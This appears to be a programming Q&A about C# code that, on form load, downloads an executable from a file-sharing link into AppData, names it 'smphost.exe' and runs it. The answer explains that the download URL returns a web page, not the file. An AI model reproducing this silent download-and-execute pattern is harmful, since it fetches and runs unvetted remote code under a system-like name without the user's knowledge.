# File won't open because its corrupt or unreadable?

Tags: c#, .net, windows, visual-studio

As you can see below I am downloading a file and opening it once my main application has loaded, this app I am downloading is a background app that helps the main app.

When I compile it I receive this error:

```
System.ComponentModel.Win32Exception: 'The file or directory is corrupted and unreadable'
```

That error happens on the Process.Start line.

Code:

```
private void Form1_Load(object sender, EventArgs e)
{
    if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + _appDataFolder))
    {
        Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"/" + _appDataFolder);
    }

    WebClient webClient = new WebClient();
    webClient.DownloadFileCompleted += new AsyncCompletedEventHandler(Completed);
    webClient.DownloadFileAsync(new Uri(
        "https://fs03n3.sendspace.com/dl/021593313c2769e2f3bb14b965ebe933/59770ba30a083303/3tpj8o/dl.exe"),
        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"/" + _appDataFolder + "/smphost.exe");
}

private void Completed(object sender, AsyncCompletedEventArgs e)
{
    var path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"/" + _appDataFolder + "/smphost.exe";

    if (!File.Exists(path))
    {
        return;
    }

    Process.Start(path);
}
```

Comment: Can you start the downloaded executable manually?

Comment: Why is this question tagged with C++, if there is no C++ code?

Comment: @RomanoZumbé obviously not, if that was the case I would of. I tagged C++ because I thought it might of been a universal issue with not just C# but other programming languages in windows.

Comment: @Beefo I'm not sure you understood me correctly. Can you start the downloaded file by clicking on it? If not, this is not a programming related issue.

Comment: Tags are for categorizing questions. Your question has nothing to do with C++, so the C++ tag is inappropriate. Please do not add tags *speculatively*. This is not an OS bug.

Answer (score 3):

I think the problem is with your download URL. I've opened https://fs03n3.sendspace.com/dl/021593313c2769e2f3bb14b965ebe933/59770ba30a083303/3tpj8o/dl.exe in my browser and it didn't download the file, instead it went to the download page. That's why you can't run the file, because you've downloaded something else (I ran your code and the downloaded file was 0KBs).

What I recommend you should do is to upload the file to your favorite cloud storage drive then use the new download URL.

Comment: Thank you, I have just noticed this.

Comment: Thats why I asked if you could open the application manually. Obviously you didn't check that